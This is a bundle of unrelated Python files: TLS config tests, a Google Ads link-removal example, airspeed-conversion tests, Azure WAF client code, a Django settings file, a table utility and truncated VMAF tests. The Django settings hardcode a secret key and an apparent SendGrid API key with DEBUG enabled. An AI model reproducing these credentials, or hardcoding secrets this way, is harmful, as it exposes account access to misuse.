skip_alert(r'SSL_CONF_cmd', r'failed to apply new conf')
def check_conf_commands(conf_commands):
assert 'error' in self.conf(
{"certificate": "default", "conf_commands": conf_commands},
'listeners/*:7080/tls',
), 'ivalid conf_commands'
check_conf_commands([])
check_conf_commands("blah")
check_conf_commands({"": ""})
check_conf_commands({"blah": ""})
check_conf_commands({"protocol": {}})
check_conf_commands({"protocol": "blah"})
check_conf_commands({"protocol": "TLSv1.2", "blah": ""})
|
py | b414b5ec34b22905abd54a77d573319df3bb29e3 | #!/usr/bin/env python
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Demonstrates how to reject or unlink a Merchant Center link request.
Prerequisite: You need to have access to a Merchant Center account. You can find
instructions to create a Merchant Center account here:
https://support.google.com/merchants/answer/188924.
To run this example, you must use the Merchant Center UI or the Content API for
Shopping to send a link request between your Merchant Center and Google Ads
accounts. You can find detailed instructions to link your Merchant Center and
Google Ads accounts here: https://support.google.com/merchants/answer/6159060.
"""
import argparse
import sys
from google.ads.google_ads.client import GoogleAdsClient
from google.ads.google_ads.errors import GoogleAdsException
def main(client, customer_id, merchant_center_account_id):
"""Demonstrates how to reject a Merchant Center link request.
Args:
client: An initialized Google Ads client.
customer_id: The Google Ads customer ID.
merchant_center_account_id: The Merchant Center account ID for the
account requesting to link.
"""
# Get the MerchantCenterLinkService client.
merchant_center_link_service = client.get_service(
"MerchantCenterLinkService", version="v6"
)
try:
# Get the extant customer account to Merchant Center account links.
list_merchant_center_links_response = merchant_center_link_service.list_merchant_center_links(
customer_id
)
number_of_links = len(
list_merchant_center_links_response.merchant_center_links
)
if number_of_links <= 0:
print(
"There are no current merchant center links to Google Ads "
f"account {customer_id}. This example will now exit."
)
return
print(
f"{number_of_links} Merchant Center link(s) found with the "
"following details:"
)
merchant_center_link_status_enum = client.get_type(
"MerchantCenterLinkStatusEnum", version="v6"
).MerchantCenterLinkStatus
for (
merchant_center_link
) in list_merchant_center_links_response.merchant_center_links:
print(
f"\tLink '{merchant_center_link.resource_name}' has status "
f"'{merchant_center_link_status_enum.Name(merchant_center_link.status)}'."
)
# Check if this is the link to the target Merchant Center account.
if merchant_center_link.id == merchant_center_account_id:
# A Merchant Center link can be pending or enabled; in both
# cases, we reject it by removing the link.
_remove_merchant_center_link(
client,
merchant_center_link_service,
customer_id,
merchant_center_link,
)
# We can terminate early since this example concerns only one
# Google Ads account to Merchant Center account link.
return
# Raise an exception if no matching Merchant Center link was found.
raise ValueError(
"No link could was found between Google Ads account "
f"{customer_id} and Merchant Center account "
f"{merchant_center_account_id}."
)
except GoogleAdsException as ex:
print(
f'Request with ID "{ex.request_id}" failed with status '
f'"{ex.error.code().name}" and includes the following errors:'
)
for error in ex.failure.errors:
print(f'\tError with message "{error.message}".')
if error.location:
for field_path_element in error.location.field_path_elements:
print(f"\t\tOn field: {field_path_element.field_name}")
sys.exit(1)
def _remove_merchant_center_link(
client, merchant_center_link_service, customer_id, merchant_center_link
):
"""Removes a Merchant Center link from a Google Ads client customer account.
Args:
client: An initialized Google Ads client.
merchant_center_link_service: An initialized
MerchantCenterLinkService client.
customer_id: The Google Ads customer ID of the account that has the link
request.
merchant_center_link: The MerchantCenterLink object to remove.
"""
# Create a single remove operation, specifying the Merchant Center link
# resource name.
operation = client.get_type("MerchantCenterLinkOperation", version="v6")
operation.remove = merchant_center_link.resource_name
# Send the operation in a mutate request.
response = merchant_center_link_service.mutate_merchant_center_link(
customer_id, operation
)
print(
"Removed Merchant Center link with resource name "
f"'{response.result.resource_name}'."
)
if __name__ == "__main__":
# GoogleAdsClient will read the google-ads.yaml configuration file in the
# home directory if none is specified.
google_ads_client = GoogleAdsClient.load_from_storage()
parser = argparse.ArgumentParser(
description=(
"Demonstrates how to reject a Merchant Center link request."
)
)
# The following argument(s) should be provided to run the example.
parser.add_argument(
"-c",
"--customer_id",
type=str,
required=True,
help="The Google Ads customer ID.",
)
parser.add_argument(
"-m",
"--merchant_center_account_id",
type=int,
required=True,
help="The Merchant Center account ID for the account requesting to "
"link.",
)
args = parser.parse_args()
main(google_ads_client, args.customer_id, args.merchant_center_account_id)
|
py | b414b67cd4c47ebca38c1e20f61ee2d0c92caa02 | # -*- coding: utf-8 -*-
"""
Python Flight Mechanics Engine (PyFME).
Copyright (c) AeroPython Development Team.
Distributed under the terms of the MIT License.
TAS CAS EAS conversion test functions
-------------------------------------
"""
from numpy.testing import (assert_almost_equal)
from pyfme.utils.anemometry import (tas2eas, eas2tas, cas2eas, eas2cas,
tas2cas, cas2tas)
from pyfme.models.constants import RHO_0, P_0
from pyfme.environment.atmosphere import ISA1976
atmosphere = ISA1976()
def test_tas2eas():
# sea level
tas = 275
eas_expected = 275
eas = tas2eas(tas, RHO_0)
assert_almost_equal(eas, eas_expected)
# Test at 11000m
_, _, rho, _ = atmosphere(11000)
tas = 275
eas_expected = 149.88797172756003
eas = tas2eas(tas, rho)
assert_almost_equal(eas, eas_expected)
def test_eas2tas():
# sea level
eas = 149.88797172756003
tas_expected = 149.88797172756003
tas = eas2tas(eas, RHO_0)
assert_almost_equal(tas, tas_expected)
# Test at 11000m
_, _, rho, _ = atmosphere(11000)
eas = 149.88797172756003
tas_expected = 275
tas = eas2tas(eas, rho)
assert_almost_equal(tas, tas_expected)
def test_tas2cas():
# sea level
tas = 275
cas_expected = 275
cas = tas2cas(tas, P_0, RHO_0)
assert_almost_equal(cas, cas_expected)
# Test at 11000m
_, p, rho, _ = atmosphere(11000)
tas = 275
cas_expected = 162.03569680495048
cas = tas2cas(tas, p, rho)
assert_almost_equal(cas, cas_expected)
def test_cas2tas():
# sea level
cas = 275
tas_expected = 275
tas = cas2tas(cas, P_0, RHO_0)
assert_almost_equal(tas, tas_expected)
# Test at 11000m
_, p, rho, _ = atmosphere(11000)
cas = 162.03569680495048
tas_expected = 275
tas = cas2tas(cas, p, rho)
assert_almost_equal(tas, tas_expected)
def test_cas2eas():
# sea level
cas = 275
eas_expected = 275
eas = cas2eas(cas, P_0, RHO_0)
assert_almost_equal(eas, eas_expected)
# Test at 11000m
_, p, rho, _ = atmosphere(11000)
cas = 162.03569680495048
eas_expected = 149.88797172756003
eas = cas2eas(cas, p, rho)
assert_almost_equal(eas, eas_expected)
def test_eas2cas():
# sea level
eas = 275
cas_expected = 275
cas = eas2cas(eas, P_0, RHO_0)
assert_almost_equal(cas, cas_expected)
# Test at 11000m
_, p, rho, _ = atmosphere(11000)
eas = 149.88797172756003
cas_expected = 162.03569680495048
cas = eas2cas(eas, p, rho)
assert_almost_equal(cas, cas_expected)
|
py | b414b7e604de5c0554349ade773a54d4b69b8ad8 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class WebApplicationFirewallPoliciesOperations:
"""WebApplicationFirewallPoliciesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.WebApplicationFirewallPolicyListResult"]:
"""Lists all of the protection policies within a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WebApplicationFirewallPolicyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_08_01.models.WebApplicationFirewallPolicyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('WebApplicationFirewallPolicyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies'} # type: ignore
def list_all(
self,
**kwargs
) -> AsyncIterable["_models.WebApplicationFirewallPolicyListResult"]:
"""Gets all the WAF policies in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either WebApplicationFirewallPolicyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_08_01.models.WebApplicationFirewallPolicyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('WebApplicationFirewallPolicyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies'} # type: ignore
async def get(
self,
resource_group_name: str,
policy_name: str,
**kwargs
) -> "_models.WebApplicationFirewallPolicy":
"""Retrieve protection policy with specified name within a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param policy_name: The name of the policy.
:type policy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WebApplicationFirewallPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_08_01.models.WebApplicationFirewallPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('WebApplicationFirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
async def create_or_update(
self,
resource_group_name: str,
policy_name: str,
parameters: "_models.WebApplicationFirewallPolicy",
**kwargs
) -> "_models.WebApplicationFirewallPolicy":
"""Creates or update policy with specified rule set name within a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param policy_name: The name of the policy.
:type policy_name: str
:param parameters: Policy to be created.
:type parameters: ~azure.mgmt.network.v2019_08_01.models.WebApplicationFirewallPolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: WebApplicationFirewallPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_08_01.models.WebApplicationFirewallPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.WebApplicationFirewallPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'WebApplicationFirewallPolicy')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('WebApplicationFirewallPolicy', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('WebApplicationFirewallPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
policy_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
policy_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes Policy.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param policy_name: The name of the policy.
:type policy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
policy_name=policy_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'policyName': self._serialize.url("policy_name", policy_name, 'str', max_length=128, min_length=0),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies/{policyName}'} # type: ignore
|
py | b414b8e66214ba33e08db8d62c683dfe4a785fb7 | import os
from pathlib import Path
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = 'django-insecure-0n7yvje91z!_l5f3kx=8#s7biqt*r+e58(y14q84b#g$c7j838'
DEBUG = True
ALLOWED_HOSTS = [
'localhost',
'127.0.0.1',
'[::1]',
'testserver',
'www.sertest2.pythonanywhere.com',
'sertest2.pythonanywhere.com',
]
AUTHENTICATION_BACKENDS = (
'users.authentication.EmailAuthBackend',
'django.contrib.auth.backends.ModelBackend',
)
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'api',
'rest_framework',
'sales_backend.apps.SalesBackendConfig',
'cart.apps.CartConfig',
'users.apps.UsersConfig',
'rest_framework.authtoken',
'orders.apps.OrdersConfig'
]
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.IsAuthenticated',
],
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework.authentication.TokenAuthentication',
]
}
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'agro_site.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'agro_site.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': str(os.path.join(BASE_DIR, "db.sqlite3")),
}
}
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'ru-RU'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
STATIC_URL = '/static/'
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
CART_SESSION_ID = 'cart'
LOGIN_URL = 'users:login'
LOGIN_REDIRECT_URL = 'sales_backend:index'
DEFAULT_FROM_EMAIL = '[email protected]'
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = 'apikey'
EMAIL_HOST_PASSWORD = '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'
EMAIL_PORT = 587
EMAIL_USE_TLS = True
|
py | b414b967c2d032bff3faee6fdd23361b4d59016a | import logging
from typing import Callable, Iterable, Dict, Any, Mapping, Optional
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def bytes_to_str(num_bytes: float) -> str:
"""Return a number of bytes as a human-readable string."""
for unit in ("bytes", "KB", "MB", "GB"):
if num_bytes < 1024:
return f"{num_bytes:.1f} {unit}"
num_bytes /= 1024
return f"{num_bytes:.1f} TB"
def table(
headers: Iterable[str],
rows: Iterable[Iterable[Any]],
fill: str = "",
header_fmt: Optional[Callable[[str], str]] = None,
row_fmt: Optional[Callable[[str], str]] = None,
alignment: Optional[Dict[str, str]] = None,
) -> str:
"""
Return a string containing a simple table created from headers and rows of entries.
Parameters
----------
headers
The column headers for the table.
rows
The entries for each row, for each column.
Should be an iterable of iterables or mappings, with the outer level containing the rows,
and each inner iterable containing the entries for each column.
An iterable-type row is printed in order.
A mapping-type row uses the headers as keys to align the stdout and can have missing values,
which are filled using the ```fill`` value.
fill
The string to print in place of a missing value in a mapping-type row.
header_fmt
A function to be called on the header string.
The return value is what will go in the output.
row_fmt
A function to be called on each row string.
The return value is what will go in the output.
alignment
A map of headers to string method names to use to align each column.
Returns
-------
table :
A string containing the table.
"""
if header_fmt is None:
header_fmt = lambda _: _
if row_fmt is None:
row_fmt = lambda _: _
if alignment is None:
alignment = {}
headers = tuple(headers)
lengths = [len(h) for h in headers]
align_methods = [alignment.get(h, "center") for h in headers]
processed_rows = []
for row in rows:
if isinstance(row, Mapping):
processed_rows.append([str(row.get(key, fill)) for key in headers])
else:
processed_rows.append([str(entry) for entry in row])
for row in processed_rows:
lengths = [max(curr, len(entry)) for curr, entry in zip(lengths, row)]
header = header_fmt(
" ".join(
getattr(h, a)(l) for h, l, a in zip(headers, lengths, align_methods)
).rstrip()
)
lines = (
row_fmt(
" ".join(getattr(f, a)(l) for f, l, a in zip(row, lengths, align_methods))
)
for row in processed_rows
)
output = "\n".join((header, *lines))
return output
|
py | b414b9e439652dcad4bb4d9114d332ff8ade3553 | import unittest
import numpy as np
from vmaf.core.asset import Asset
from vmaf.config import VmafConfig
from vmaf.core.vmafexec_feature_extractor import FloatMotionFeatureExtractor, IntegerMotionFeatureExtractor, \
FloatVifFeatureExtractor, FloatAdmFeatureExtractor, IntegerVifFeatureExtractor, IntegerPsnrFeatureExtractor, \
IntegerAdmFeatureExtractor, CIEDE2000FeatureExtractor
from test.testutil import set_default_576_324_videos_for_testing, \
set_default_576_324_12bit_videos_for_testing, \
set_default_576_324_16bit_videos_for_testing, \
set_default_576_324_10bit_videos_for_testing
class FeatureExtractorTest(unittest.TestCase):
def setUp(self):
self.verificationErrors = []
self.maxDiff = None
def tearDown(self):
if hasattr(self, 'fextractor'):
self.fextractor.remove_results()
pass
self.assertEqual([], self.verificationErrors)
def test_run_float_motion_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': False}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['float_motion_feature_motion2_score'], 3.8953518541666665, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_motion_feature_motion2_score'], 3.8953518541666665, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
with self.assertRaises(KeyError):
s = results[0]['float_motion_feature_motion_score']
def test_run_float_motion_fextractor_with_debug(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': True}
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
try: self.assertAlmostEqual(results[0]['float_motion_feature_motion2_score'], 3.8953518541666665, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_motion_feature_motion2_score'], 3.8953518541666665, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[0]['float_motion_feature_motion_score'], 4.0498253125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
try: self.assertAlmostEqual(results[1]['float_motion_feature_motion_score'], 4.0498253125, places=6)
except AssertionError as e: self.verificationErrors.append(str(e))
def test_run_float_motion_fextractor_forcing_zero(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = FloatMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'motion_force_zero': True, 'debug': True},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['float_motion_feature_motion2_force_0_score'], 0.0, places=8)
self.assertAlmostEqual(results[1]['float_motion_feature_motion2_force_0_score'], 0.0, places=8)
self.assertAlmostEqual(results[0]['float_motion_feature_motion_force_0_score'], 0.0, places=8)
self.assertAlmostEqual(results[1]['float_motion_feature_motion_force_0_score'], 0.0, places=8)
self.assertEqual(len(results[0]['float_motion_feature_motion2_force_0_scores']), 48)
self.assertEqual(len(results[1]['float_motion_feature_motion2_force_0_scores']), 48)
def test_run_integer_motion_fextractor(self):
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.fextractor = IntegerMotionFeatureExtractor(
[asset, asset_original],
None, fifo_mode=False,
result_store=None,
optional_dict={'debug': False},
)
self.fextractor.run(parallelize=True)
results = self.fextractor.results
self.assertAlmostEqual(results[0]['integer_motion_feature_motion2_score'], 3.895345229166667, places=8)
self.assertAlmostEqual(results[1]['integer_motion_feature_motion2_score'], 3.895345229166667, places=8)
with self.assertRaises(KeyError):
